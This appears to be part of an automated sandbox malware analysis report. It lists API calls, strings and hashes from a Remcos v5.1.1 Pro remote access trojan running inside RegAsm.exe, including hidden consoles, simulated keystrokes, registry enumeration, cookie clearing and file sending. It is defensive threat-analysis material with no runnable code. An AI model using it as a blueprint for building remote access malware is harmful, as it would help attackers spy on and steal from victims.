                                                                • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                                APIs
                                                                • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                • ExitThread.KERNEL32 ref: 004018F6
                                                                • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                • String ID: PkG$XMG$NG$NG
                                                                • API String ID: 1649129571-3151166067
                                                                • Opcode ID: d03b4b87c98bc19dde34d1777c040e42b75bf9adce6b93ea1611c5cc13a7821a
                                                                • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                                • Opcode Fuzzy Hash: d03b4b87c98bc19dde34d1777c040e42b75bf9adce6b93ea1611c5cc13a7821a
                                                                • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
                                                                • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                • CloseHandle.KERNEL32(00000000), ref: 00407A88
                                                                • MoveFileW.KERNEL32 ref: 00407AA5
                                                                • CloseHandle.KERNEL32(00000000), ref: 00407AD0
                                                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                                  • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                                  • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                • String ID: .part
                                                                • API String ID: 1303771098-3499674018
                                                                • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                                • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                                APIs
                                                                • AllocConsole.KERNEL32 ref: 0041CE35
                                                                • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Console$Window$AllocOutputShow
                                                                • String ID: Remcos v$5.1.1 Pro$CONOUT$
                                                                • API String ID: 4067487056-3820604032
                                                                • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                                • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                                APIs
                                                                • SendInput.USER32 ref: 00419A25
                                                                • SendInput.USER32(00000001,?,0000001C), ref: 00419A4D
                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                                • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                                  • Part of subcall function 004199CE: MapVirtualKeyA.USER32 ref: 004199D4
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InputSend$Virtual
                                                                • String ID:
                                                                • API String ID: 1167301434-0
                                                                • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                                • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __freea$__alloca_probe_16_free
                                                                • String ID: a/p$am/pm$h{D
                                                                • API String ID: 2936374016-2303565833
                                                                • Opcode ID: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                                                • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                                • Opcode Fuzzy Hash: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                                                • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                                APIs
                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                • _free.LIBCMT ref: 00444E87
                                                                • _free.LIBCMT ref: 00444E9E
                                                                • _free.LIBCMT ref: 00444EBD
                                                                • _free.LIBCMT ref: 00444ED8
                                                                • _free.LIBCMT ref: 00444EEF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$AllocateHeap
                                                                • String ID: KED
                                                                • API String ID: 3033488037-2133951994
                                                                • Opcode ID: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                                                • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                                • Opcode Fuzzy Hash: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                                                • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                                APIs
                                                                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413BC6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Enum$InfoQueryValue
                                                                • String ID: [regsplt]$xUG$TG
                                                                • API String ID: 3554306468-1165877943
                                                                • Opcode ID: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                                • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                                • Opcode Fuzzy Hash: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                                • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                                APIs
                                                                • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                • __fassign.LIBCMT ref: 1000954F
                                                                • __fassign.LIBCMT ref: 1000956A
                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                                                                • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                • String ID:
                                                                • API String ID: 1324828854-0
                                                                • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                APIs
                                                                • GetConsoleCP.KERNEL32 ref: 0044B47E
                                                                • __fassign.LIBCMT ref: 0044B4F9
                                                                • __fassign.LIBCMT ref: 0044B514
                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000), ref: 0044B559
                                                                • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000), ref: 0044B592
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                • String ID:
                                                                • API String ID: 1324828854-0
                                                                • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                                • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                                APIs
                                                                • RegOpenKeyExW.ADVAPI32 ref: 00413D81
                                                                  • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                  • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00413EEF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseEnumInfoOpenQuerysend
                                                                • String ID: xUG$NG$NG$TG
                                                                • API String ID: 3114080316-2811732169
                                                                • Opcode ID: 45ce03b6782cd753b7e5a82f0aafb309821f1a3d97b9e276ee7b54a3a4dbf0fc
                                                                • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                                • Opcode Fuzzy Hash: 45ce03b6782cd753b7e5a82f0aafb309821f1a3d97b9e276ee7b54a3a4dbf0fc
                                                                • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                                APIs
                                                                • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                • String ID: csm
                                                                • API String ID: 1170836740-1018135373
                                                                • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                APIs
                                                                  • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32 ref: 00413678
                                                                  • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                  • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                  • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                • _wcslen.LIBCMT ref: 0041B7F4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                                • API String ID: 3286818993-122982132
                                                                • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                                • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                                APIs
                                                                  • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                  • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                                  • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                                • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                • API String ID: 1133728706-4073444585
                                                                • Opcode ID: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                                                                • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                                • Opcode Fuzzy Hash: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                                                                • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                                                • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                                • Opcode Fuzzy Hash: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                                                • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                                APIs
                                                                  • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                • _free.LIBCMT ref: 100092AB
                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                • _free.LIBCMT ref: 100092B6
                                                                • _free.LIBCMT ref: 100092C1
                                                                • _free.LIBCMT ref: 10009315
                                                                • _free.LIBCMT ref: 10009320
                                                                • _free.LIBCMT ref: 1000932B
                                                                • _free.LIBCMT ref: 10009336
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                APIs
                                                                  • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                                • _free.LIBCMT ref: 00450FC8
                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 00450FD3
                                                                • _free.LIBCMT ref: 00450FDE
                                                                • _free.LIBCMT ref: 00451032
                                                                • _free.LIBCMT ref: 0045103D
                                                                • _free.LIBCMT ref: 00451048
                                                                • _free.LIBCMT ref: 00451053
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                                • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                                • int.LIBCPMT ref: 004111BE
                                                                  • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                  • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                • String ID: (mG
                                                                • API String ID: 2536120697-4059303827
                                                                • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                                • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                                • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLastValue___vcrt_
                                                                • String ID:
                                                                • API String ID: 3852720340-0
                                                                • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                                • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                                APIs
                                                                • CoInitializeEx.OLE32(00000000,00000002), ref: 0040760B
                                                                  • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                                  • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                • CoUninitialize.OLE32 ref: 00407664
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
